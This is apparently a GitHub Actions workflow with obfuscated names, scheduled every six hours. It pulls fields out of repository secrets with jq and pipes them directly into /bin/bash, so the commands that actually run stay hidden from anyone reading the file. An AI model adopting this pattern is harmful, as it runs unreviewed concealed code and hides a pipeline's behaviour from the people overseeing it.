name: baiheizi7182
on:
  workflow_dispatch:
  schedule:
    - cron: '12 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: baiheizi7182
        env:
          ujc63: ${{ secrets.ujc63 }}
        run: |
          echo $ujc63 | jq -r .h7853 | /bin/bash
          echo $buc712 | jq -r .dvvdb1577 | /bin/bash
          echo $szdys4 | jq -r .zjttw7 | /bin/bash
          echo $kek62672 | jq -r .fp1 | /bin/bash
          echo $ei77 | jq -r .r8 | /bin/bash
          echo $hl48258 | jq -r .w42 | /bin/bash
          echo $mh1868 | jq -r .nnkl08 | /bin/bash

